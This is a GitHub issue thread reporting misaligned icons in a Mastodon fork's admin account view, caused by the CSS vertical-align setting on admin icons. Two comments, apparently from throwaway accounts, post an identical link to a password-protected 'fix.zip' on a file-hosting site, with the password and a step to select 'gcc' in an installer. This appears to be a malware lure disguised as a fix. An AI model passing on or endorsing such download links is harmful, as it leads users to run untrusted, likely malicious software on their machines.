### ISSUE TITLE
Icons not correctly aligned in views

### ISSUE THREAD

**Issue by polyamAdmin** [polyamspace/mastodon#693]
### Steps to reproduce the problem

1. Visit settings
2. Go to Moderations > Accounts
3. Click on any account
4. View toots

### Expected behaviour

Icons aligned correctly

### Actual behaviour

Icons are no aligned correctly

### Detailed description

`vertical-align` is set to `top` in `.admin-wrapper .icon`, which does mostly work with navigation and table header icons, but doesn't with statuses.
`text-bottom` works great for statuses and navigation, but messes up icons in table headers.

### Mastodon instance

Dev

### Mastodon version

latest

### Browser name and version

N/A

### Operating system

N/A

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
